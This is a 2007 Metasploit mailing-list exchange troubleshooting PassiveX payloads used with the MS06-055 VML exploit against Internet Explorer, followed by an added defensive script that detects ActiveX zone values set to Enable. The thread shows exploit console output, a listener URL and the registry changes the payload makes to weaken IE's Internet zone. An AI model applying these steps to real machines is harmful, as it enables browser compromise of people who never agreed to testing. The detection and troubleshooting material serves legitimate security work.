[framework] PassiveX-based payloads and MS06-055

mmiller at hick.org mmiller at hick.org
Tue Mar 13 11:42:32 CDT 2007


On Tue, Mar 13, 2007 at 12:35:27PM +0100, Angelo Dell'Aera wrote:
> 
> 
> While doing a few tests I noticed a strange behavior while trying
> to exploit the VML processing vulnerability in IE referenced by the
> Microsoft Bulletin MS06-055 on Windows XP SP1.
>
... 
>
> I see this behavior...
> 
> 
> msf exploit(ms06_055_vml_method) > exploit
> [*] PassiveX listener started.
> [*] Using URL: http://192.168.33.130:8080/pentest3
> [*] Server started.
> [*] Exploit running as background job.
> msf exploit(ms06_055_vml_method) > 
> [*] Sending PassiveX main page to client
> 
> 
> and it stops here. I tried using other PassiveX-based payloads with
> the same exploit but no luck... always the same result. Other non
> PassiveX-based payloads work instead.
> 
> I took a look at the registry and everything seems to work fine since 
> 
> Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
> Settings\Zones\3
> Values: 1004, 1200, 1201, 1001
> 
> are changed to the value 0 as expected.

A few quick things to check:

1) What version of IE is installed on the machine?  I'm assuming IE 6,
but just need to be sure.

2) What happens when you manually bring up the PX site after the values
have been successfully altered?  In the previous example, you could try
browsing to:

http://192.168.33.130:10000//OPrZwdoVOupJ0PB4rCdiaWXi1wIB5e9s

There might be some additional information you can collect by doing
'setg LogLevel 3' and then taking a look at ~/.msf3/logs/framework.log.
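As an added defender-side check that is not part of the original thread: a small script that parses a `reg export` of the Zone 3 key named in the message and reports which of the four ActiveX action values (1001, 1004, 1200, 1201) are set to 0 (Enable). The action descriptions follow Microsoft's documented zone action IDs; `enabled_activex_actions`, `parse_reg_export` and the sample export are my own constructions.

```python
# Report IE Internet-zone (Zone 3) ActiveX actions that are set to Enable (0).
# Added example; the parser and sample export are constructed for illustration.
import re

# Zone action IDs as documented by Microsoft for IE security zones.
ACTIVEX_ACTIONS = {
    "1001": "Download signed ActiveX controls",
    "1004": "Download unsigned ActiveX controls",
    "1200": "Run ActiveX controls and plug-ins",
    "1201": "Initialize and script ActiveX controls not marked as safe",
}
ENABLE, PROMPT, DISABLE = 0, 1, 3  # documented zone action values

# reg export writes the long hive name, not the HKCU abbreviation used in the mail.
ZONE3_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"


def parse_reg_export(text):
    """Return {key_path: {value_name: int}} for the dword values in a .reg export."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        key_match = re.match(r"^\[(.+)\]$", line)
        if key_match:
            current = key_match.group(1)
            keys[current] = {}
            continue
        val_match = re.match(r'^"(\d+)"=dword:([0-9a-fA-F]{8})$', line)
        if val_match and current is not None:
            keys[current][val_match.group(1)] = int(val_match.group(2), 16)
    return keys


def enabled_activex_actions(reg_text, key=ZONE3_KEY):
    """Sorted (id, description) pairs for ActiveX actions whose value is Enable (0)."""
    values = parse_reg_export(reg_text).get(key, {})
    return sorted((vid, desc) for vid, desc in ACTIVEX_ACTIONS.items()
                  if values.get(vid) == ENABLE)


# Constructed sample export: all four values at 0, as described in the message.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1001"=dword:00000000
"1004"=dword:00000000
"1200"=dword:00000000
"1201"=dword:00000000
"1400"=dword:00000000
"""

if __name__ == "__main__":
    for vid, desc in enabled_activex_actions(SAMPLE_REG):
        print(f"Zone 3 action {vid} ({desc}) is set to Enable")
```

On Windows, `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" zone3.reg` produces a UTF-16 file; decode it with `utf-16` before handing the text to `enabled_activex_actions`. Any non-empty result on a host that is not under test means the Internet zone has been weakened and should be investigated.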